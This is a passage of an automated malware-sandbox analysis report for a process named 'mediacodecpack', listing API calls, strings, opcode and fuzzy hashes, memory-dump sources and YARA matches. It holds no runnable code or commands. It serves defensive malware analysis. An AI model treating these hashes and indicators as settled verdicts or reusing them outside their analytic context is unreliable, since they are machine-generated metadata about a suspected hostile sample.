                                                                                            • Opcode Fuzzy Hash: aee66d3fffd8d4490c13bef9ab54e426df536a32260f4fbb9f345b8a326bd45c
                                                                                            • Instruction Fuzzy Hash: BDF04472680204BBDB00AAA0ED8DFDA772CFB45711FD04821F605D6280DB61E9A0CAF0
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02D41ED2
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D41EEA
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D41EF9
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D41F0E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D41F15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 830998967-0
                                                                                            • Opcode ID: 3b9dbc119f52d368ee4cf22b99deb1bb135f69062e0ab0c1a1ff70bec978913a
                                                                                            • Instruction ID: 29f83920eae415b2a2922c83cc2f912f88fee804324526c83781740b3c2568c6
                                                                                            • Opcode Fuzzy Hash: 3b9dbc119f52d368ee4cf22b99deb1bb135f69062e0ab0c1a1ff70bec978913a
                                                                                            • Instruction Fuzzy Hash: F0F01772640605BBDB00AFA1FD88FD6B76CFF15715F900426F60186641DB61E9A5CBF0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ($string or blob too big$|
                                                                                            • API String ID: 632333372-2398534278
                                                                                            • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                            • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memmove
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 4104443479-4289949731
                                                                                            • Opcode ID: 2acceca900b3638cbf87835bea4842379aa24a73124b8b93d92be02f0fcac309
                                                                                            • Instruction ID: c80070f147a7f945aa71bda01eaa3536dbe0c6e523cd6756e158772a65a6598f
                                                                                            • Opcode Fuzzy Hash: 2acceca900b3638cbf87835bea4842379aa24a73124b8b93d92be02f0fcac309
                                                                                            • Instruction Fuzzy Hash: DA41A131700300ABEB349E69DC84E6AF7AAEB41764B40492DE856C7781DF70EC09CBA1
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D430C3
                                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D43102
                                                                                            • _memcmp.LIBCMT ref: 02D43141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 1618111833-2422070025
                                                                                            • Opcode ID: 3ec036e9fe497feee83c42a190750b6b8b1a23965434b1030f2413228ca42733
                                                                                            • Instruction ID: 945c8923e30f8dd800d032e0fb4a4abc0400deb86efb4ee7e998a3b422a7c322
                                                                                            • Opcode Fuzzy Hash: 3ec036e9fe497feee83c42a190750b6b8b1a23965434b1030f2413228ca42733
                                                                                            • Instruction Fuzzy Hash: A731E4719007049FDB209F68C89476EB7A6EF42354F2085A9E8659B380DF719D41CB90
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Protect$Query
                                                                                            • String ID: @
                                                                                            • API String ID: 3618607426-2766056989
                                                                                            • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                            • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                            • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                            • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                            • String ID: d
                                                                                            • API String ID: 211589378-2564639436
                                                                                            • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                            • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D41F5B
                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D41FC5
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02D41FD2
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                            • String ID: iocp
                                                                                            • API String ID: 998023749-976528080
                                                                                            • Opcode ID: 5eaf977fa38e0868680b1111285cb59f9137cc7d158c9d3396b27622619242db
                                                                                            • Instruction ID: 04d8ab521700d09e73c88342a66b66437f233d1f0af1624dcce2fd440191adcc
                                                                                            • Opcode Fuzzy Hash: 5eaf977fa38e0868680b1111285cb59f9137cc7d158c9d3396b27622619242db
                                                                                            • Instruction Fuzzy Hash: 3721A8B1901B449FC720DF6AD50455AFBF8FF94710B108A5FD4A693B90D7B0A944CF91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • std::exception::exception.LIBCMT ref: 02D527FB
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D52810
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3074076210-2104205924
                                                                                            • Opcode ID: 6cb799b5df9782ee2443bbfe18bd4e4ce1edcae06988af8c6b7c8837030be921
                                                                                            • Instruction ID: 4e2ae869dbba8b5ad94139df78305f0f1532182b575f40ec34074acbeb53f851
                                                                                            • Opcode Fuzzy Hash: 6cb799b5df9782ee2443bbfe18bd4e4ce1edcae06988af8c6b7c8837030be921
                                                                                            • Instruction Fuzzy Hash: 9EE0303450022EA7DF01EEA4DD09DAF7B7DEB00355F1045959C1566790EBB1DE48CAA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D437B6
                                                                                            • __localtime64.LIBCMT ref: 02D437C1
                                                                                              • Part of subcall function 02D51610: __gmtime64_s.LIBCMT ref: 02D51623
                                                                                            • std::exception::exception.LIBCMT ref: 02D437D9
                                                                                              • Part of subcall function 02D514E3: std::exception::_Copy_str.LIBCMT ref: 02D514FC
                                                                                              • Part of subcall function 02D4952C: __EH_prolog.LIBCMT ref: 02D49531
                                                                                              • Part of subcall function 02D4952C: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D49540
                                                                                              • Part of subcall function 02D4952C: __CxxThrowException@8.LIBCMT ref: 02D4955F
                                                                                            Strings
                                                                                            • could not convert calendar time to UTC time, xrefs: 02D437CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                            • API String ID: 1963798777-2088861013
                                                                                            • Opcode ID: 68fa9473a2726aa6cfc16bc728d633138d893851dd962dab4f1a25c227955f11
                                                                                            • Instruction ID: f301c5407fbf81bcb089087a4995aabdb32b527d8f04d7e92735d252db327e3b
                                                                                            • Opcode Fuzzy Hash: 68fa9473a2726aa6cfc16bc728d633138d893851dd962dab4f1a25c227955f11
                                                                                            • Instruction Fuzzy Hash: 80E039B2D001199BCF00EFA4D808BFEBB79EB04300F108599D825A2340DB759A19CEA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                            • API String ID: 1646373207-2713375476
                                                                                            • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                            • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer_memmove
                                                                                            • String ID:
                                                                                            • API String ID: 1721217611-0
                                                                                            • Opcode ID: 20a9a6c488b5d0afcaf11be54f154144c4b16a68a1becd0c6b46f9baa4091bf1
                                                                                            • Instruction ID: 3e4e77ef2cefa624aec2568232b439115c1d30b1e28e5bb871769debd386d078
                                                                                            • Opcode Fuzzy Hash: 20a9a6c488b5d0afcaf11be54f154144c4b16a68a1becd0c6b46f9baa4091bf1
                                                                                            • Instruction Fuzzy Hash: 8D418135205362DEEF245B25E960BB633A5EF117A4F28441DED558A7D0EBF1EC80CAA0
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D503CF
                                                                                              • Part of subcall function 02D43FDC: __EH_prolog.LIBCMT ref: 02D43FE1
                                                                                              • Part of subcall function 02D43FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D43FF3
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D503C4
                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D50410
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D504E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 2825413587-0
                                                                                            • Opcode ID: 4b803ab20659b20794ce99e88f55364898e5864720ccb6e974c417112b3c7d25
                                                                                            • Instruction ID: 564a45bcf18461e1f65efd2039e4958d82d76c1c9b08d6ab15ad2b9c236412e4
                                                                                            • Opcode Fuzzy Hash: 4b803ab20659b20794ce99e88f55364898e5864720ccb6e974c417112b3c7d25
                                                                                            • Instruction Fuzzy Hash: A551AC716043598BEF20CF28C88875A77E4FF48329F194628ECA9A7390DB75DC45CB91
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D5E2EC
                                                                                            • __isleadbyte_l.LIBCMT ref: 02D5E31A
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D5E348
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D5E37E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1648232842-0
                                                                                            APIs
                                                                                            • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                            • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 3429445273-0
                                                                                            APIs
                                                                                            • htons.WS2_32(?), ref: 02D43DA2
                                                                                              • Part of subcall function 02D43BD3: __EH_prolog.LIBCMT ref: 02D43BD8
                                                                                              • Part of subcall function 02D43BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D43BED
                                                                                            • htonl.WS2_32(00000000), ref: 02D43DB9
                                                                                            • htonl.WS2_32(00000000), ref: 02D43DC0
                                                                                            • htons.WS2_32(?), ref: 02D43DD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                            • String ID:
                                                                                            • API String ID: 3882411702-0
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            APIs
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D423D0
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D423DE
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42401
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D42408
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 4018804020-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                            • String ID:
                                                                                            • API String ID: 3016257755-0
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                            • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2673540737-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                            • String ID:
                                                                                            • API String ID: 3526213481-0
                                                                                            APIs
                                                                                            • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                            • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                              • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                              • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                            • sqlite3_step.SQLITE3 ref: 60969197
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
